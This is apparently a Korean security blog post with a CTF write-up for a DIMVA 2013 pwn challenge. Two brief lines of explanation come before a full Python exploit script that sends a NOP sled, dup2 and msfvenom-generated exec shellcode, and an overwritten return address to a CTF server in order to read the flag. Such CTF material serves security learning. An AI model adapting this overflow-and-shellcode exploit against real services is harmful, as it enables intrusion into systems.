NX가 걸려있지 않았고, 레지스트를 보여줬다.
그래서 그냥 해당 주소에 쉘코드를 넣고, EIP를 그쪽으로 우회하면 된다.
from struct import * import hashlib import time import sys s = socket(AF_INET, SOCK_STREAM) s.connect(('dimvactf.0x90.eu',1116)) raw_input('go?') s.settimeout(2) s.recv(1024) fd = 4 shellcode = "\x31\xc9\xb1\x02\x31\xdb\xb3\x41\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7" # dup2 shellcode = shellcode.replace("\x41", chr(fd)) # ./msfvenom -p linux/x86/exec CMD="/bin/cat flag" -b '\x0a\x00' shellcode += "\xba\xa1\xdd\xa6\x03\xd9\xc5\xd9\x74\x24\xf4\x5e\x29\xc9" +\ "\xb1\x0d\x83\xee\xfc\x31\x56\x0f\x03\x56\xae\x3f\x53\x69" +\ "\xbb\xe7\x05\x3c\xdd\x7f\x1b\xa2\xa8\x67\x0b\x0b\xd9\x0f" +\ "\xcc\x3b\x32\xb2\xa5\xd5\xc5\xd1\x64\xc2\xdb\x15\x89\x12" +\ "\xcc\x77\xe0\x7c\x3d\x1b\x93\xf4\x61\xbd\x3f\x94\x06\x41" +\ "\x97\x05\x41\xa0\xda\x2a" body = "a"*128 SHA256 = hashlib.sha256(body).digest() data = "ProtoSecure1.0\xf0\x0f"+SHA256+body data += "\x90"*(1388-len(shellcode)-4) data += shellcode+"\x90\x90\x90\x90" data += pack('<L',0xffffd2e8) s.send(data) print s.recv(65000) print s.recv(65000) print s.recv(65000) s.close()
'Computer Security > CTF' 카테고리의 다른 글
| Whitehat Contest 개인전 예선 보고서 (2) | 2013.09.12 |
|---|---|
| [DIMVA 2013] pwn 200 exploit (0) | 2013.07.23 |
| [SIGINT 2013] trollsex(tr0llsex) exploit (0) | 2013.07.08 |
| [SIGINT 2013] mail exploit (0) | 2013.07.08 |
| [SIGINT 2013] proxy exploit (0) | 2013.07.08 |